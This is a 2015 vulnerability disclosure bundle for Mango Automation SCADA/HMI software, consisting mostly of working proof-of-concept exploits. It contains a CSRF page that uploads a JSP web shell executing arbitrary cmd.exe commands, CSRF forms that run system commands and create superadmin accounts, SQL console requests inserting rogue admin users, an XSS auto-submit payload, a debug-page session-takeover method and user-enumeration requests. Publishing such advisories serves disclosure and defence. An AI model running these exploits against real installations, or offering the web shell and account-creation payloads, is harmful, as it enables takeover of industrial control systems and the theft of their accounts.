Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution
Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)
Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you
to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.
Desc: Mango suffers from an authenticated arbitrary JSP code execution. The vulnerability is caused due
to the improper verification of uploaded image files in 'graphicalViewsBackgroundUpload' script via the
'backgroundImage' POST parameter which allows of arbitrary files being uploaded in '/modules/graphicalViews/web/graphicalViewUploads/'.
This can be exploited to execute arbitrary JSP code by uploading a malicious JSP script file that will be
stored as a sequence number depending on how many files were uploaded (1.jsp or 2.jsp or 3.jsp .. n.jsp).
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Jetty(9.2.2.v20140723)
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5262
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5262.php
20.08.2015
--
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:8080/graphicalViewsBackgroundUpload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryb8cxmjBwpzDcHUVI");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryb8cxmjBwpzDcHUVI\r\n" +
"Content-Disposition: form-data; name=\"backgroundImage\"; filename=\"cmd.jsp\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c%@ page import=\"java.util.*,java.io.*,java.net.*\"%\x3e\r\n" +
"\x3cHTML\x3e\x3cBODY\x3e\r\n" +
"\x3cFORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\"\x3e\r\n" +
"\x3cINPUT TYPE=\"text\" NAME=\"cmd\"\x3e\r\n" +
"\x3cINPUT TYPE=\"submit\" VALUE=\"Send\"\x3e\r\n" +
"\x3c/FORM\x3e\r\n" +
"\x3cpre\x3e\r\n" +
"\x3c%\r\n" +
"if (request.getParameter(\"cmd\") != null) {\r\n" +
" out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\\n\x3cBR\x3e\");\r\n" +
" Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"cmd\"));\r\n" +
" OutputStream os = p.getOutputStream();\r\n" +
" InputStream in = p.getInputStream();\r\n" +
" DataInputStream dis = new DataInputStream(in);\r\n" +
" String disr = dis.readLine();\r\n" +
" while ( disr != null ) {\r\n" +
" out.println(disr); disr = dis.readLine(); }\r\n" +
" }\r\n" +
"%\x3e\r\n" +
"\x3c/pre\x3e\r\n" +
"\x3c/BODY\x3e\x3c/HTML\x3e\r\n" +
"------WebKitFormBoundaryb8cxmjBwpzDcHUVI--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Webshell: http://localhost:8080/modules/graphicalViews/web/graphicalViewUploads/17.jsp
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary Command Execution Exploit
Advisory ID: ZSL-2015-5261
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5261.php
20.08.2015
--
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/EventHandlersDwr.testProcessCommand.dwr" method="POST">
<input type="hidden" name="callCount" value="1" />
<input type="hidden" name="page" value="/event_handlers.shtm" />
<input type="hidden" name="httpSessionId" value=" " />
<input type="hidden" name="scriptSessionId" value="26D579040C1C11D2E21D1E5F321094E5866" />
<input type="hidden" name="c0-scriptName" value="EventHandlersDwr" />
<input type="hidden" name="c0-methodName" value="testProcessCommand" />
<input type="hidden" name="c0-id" value="0" />
<input type="hidden" name="c0-param0" value="string:C:\\windows\\system32\\calc.exe" />
<input type="hidden" name="c0-param1" value="string:15" />
<input type="hidden" name="batchId" value="24" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability
Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php
20.08.2015
--
One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):
- http://localhost:8080/status/
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:
- http://localhost/status/mango.json?time=$
- http://localhost/status/
Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n LONG_POLL_DATA_TIMEOUT=1440143583487\r\n LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n constants.Permissions.DataPointAccessTypes.READ=1\r\n org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n constants.DataTypes.BINARY=1\r\n constants.UserComment.TYPE_EVENT=1\r\n constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n
Also you can list all of the Classes known to DWR:
- http://localhost:8080/dwr/index.html
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary SQL Query Execution
Advisory ID: ZSL-2015-5259
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5259.php
20.08.2015
--
SQL query in version 2.5.2 (pass 123123) with hash injection:
-------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','Y','N',1440075860103,'','0','N','','Y');
1 records(s) updated.
SQL query in version 2.6.0 beta build 327 (pass 123123) with hash injection:
----------------------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','N',1440075860103,'','0','N','','Y','superadmin');
1 records(s) updated.
USERS table:
ID USERNAME PASSWORD EMAIL PHONE DISABLED LASTLOGIN HOMEURL RECEIVEALARMEMAILS RECEIVEOWNAUDITEVENTS TIMEZONE MUTED PERMISSIONS
1.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&query=Submit+query
2.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&tables=Get+table+list
3.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 246
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=INSERT+INTO+USERS+VALUES%289%2C%27gjoko3%27%2C%27YB8YiWZ%2B%2BuuzO4wSVyg12j8Cf3g%3D%27%2C%27gjoko%40z.sl%27%2C%27333222111%27%2C%27Y%27%2C%27N%27%2C1440075860103%2C%27%27%2C%270%27%2C%27N%27%2C%27%27%2C%27Y%27%29%3B&update=Submit+update
#################################################################
Mango Automation 2.6.0 CSRF Add Admin Exploit
Advisory ID: ZSL-2015-5258
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5258.php
20.08.2015
--
2.5.2:
<!-- user hacker, pass 123123 -->
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/UsersDwr.saveUserAdmin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1 page=/users.shtm httpSessionId= scriptSessionId=8BD64066486071219EB8691611D48F14109 c0-scriptName=UsersDwr c0-methodName=saveUserAdmin c0-id=0 c0-param0=number:-1 c0-param1=string:hacker c0-param2=string:123123 c0-param3=string:hacker%40hacker.hack c0-param4=string:111222333 c0-param5=boolean:true c0-param6=boolean:false c0-param7=string:0 c0-param8=boolean:false c0-param9=string: c0-param10=Array:[] c0-param11=Array:[] batchId=5 " />
<input type="submit" value="Submit request 1" />
</form>
</body>
</html>
2.6.0 beta (build 327):
<!-- user hacker3, pass admin (in sha1(base64) hash value) -->
<html>
<body>
<form action="http://localhost:8080/rest/v1/users.json" method="POST" enctype="text/plain">
<input type="hidden" name="{"username":"hacker3","password":"0DPiKuNIrrVmD8IUCuw1hQxNqZc" value="","email":"hacker@zeroscience.mk","phone":"111222333","muted":true,"disabled":false,"homeUrl":"http://www.zeroscience.mk","receiveAlarmEmails":"NONE","receiveOwnAuditEvents":false,"timezone":"","permissions":"user,superadmin"}" />
<input type="submit" value="Submit request 2" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability
Advisory ID: ZSL-2015-5257
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5257.php
20.08.2015
--
<html>
<head>
<title>Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability</title>
</head>
<body>
<form name="login" method="post" action="http://localhost:8080/login.htm">
<input type="hidden" name="username" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="password" value="blah" />
</form>
<script type="text/javascript">
document.login.submit();
</script>
</body>
</html>
#################################################################
Mango Automation 2.6.0 User Enumeration Weakness
Advisory ID: ZSL-2015-5256
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5256.php
20.08.2015
--
Request for non-existent username:
----------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm;jsessionid=6zpfpnxljyzf13l3zrpx9e0xd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=noob&password=123123
Response:
- <td class="formError">User id not found</td>
Request for existent username:
------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=admin&password=123123
Response:
- <td colspan="3" class="formError">Invalid login<br/>
